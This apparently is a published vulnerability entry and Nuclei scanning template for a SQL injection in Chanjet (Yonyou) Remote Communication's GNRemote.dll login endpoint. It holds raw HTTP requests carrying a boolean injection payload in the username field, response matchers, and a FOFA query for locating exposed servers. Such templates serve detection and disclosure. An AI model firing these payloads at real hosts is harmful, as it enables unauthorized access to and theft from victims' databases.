漏洞描述
Chanjetong has a SQL injection vulnerability, which can be used by attackers to obtain sensitive information in the database.
chanjet-gnremote-sqli: Changjietong Remote Communication GNRemote.dll - SQL Injection
PoC代码[已公开]
id: chanjet-gnremote-sqli
info:
name: Changjietong Remote Communication GNRemote.dll - SQL Injection
author: SleepingBag945
severity: high
description: |
Chanjetong has a SQL injection vulnerability, which can be used by attackers to obtain sensitive information in the database.
reference:
- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/90103c248a2c52bb0a060d0ee95d5a67e4579c3d/docs/wiki/webapp/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B%20%E7%95%85%E6%8D%B7%E9%80%9A%E8%BF%9C%E7%A8%8B%E9%80%9A%20GNRemote.dll%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
metadata:
verified: true
max-request: 2
fofa-query: body="远程通CHANJET_Remote"
tags: yonyou,chanjet,sqli,vuln
http:
- raw:
- |
POST /GNRemote.dll?GNFunction=LoginServer&decorator=text_wrap&frombrowser=esl HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
username=%22'%20or%201%3d1%3b%22&password=%018d8cbc8bfc24f018&ClientStatus=1
- |
POST /GNRemote.dll?GNFunction=LoginServer&decorator=text_wrap&frombrowser=esl HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
username=%22'%20or%201%3d2%3b%22&password=%018d8cbc8bfc24f018&ClientStatus=1
matchers-condition: and
matchers:
- type: word
part: body_1
words:
- "{\"RetCode\":0}"
- type: word
part: body_2
words:
- "{\"RetCode\":2}"
# digest: 490a0046304402205e24964eaa89c65121a4fac8172e3d2355d4a2bedb0724d5358c8abd4f49b0c8022070023aa25f712fab9644ecc7cc6c8b504b728a318475526ac61379b19ee50513:922c64590222798bb761d5b6d8e72950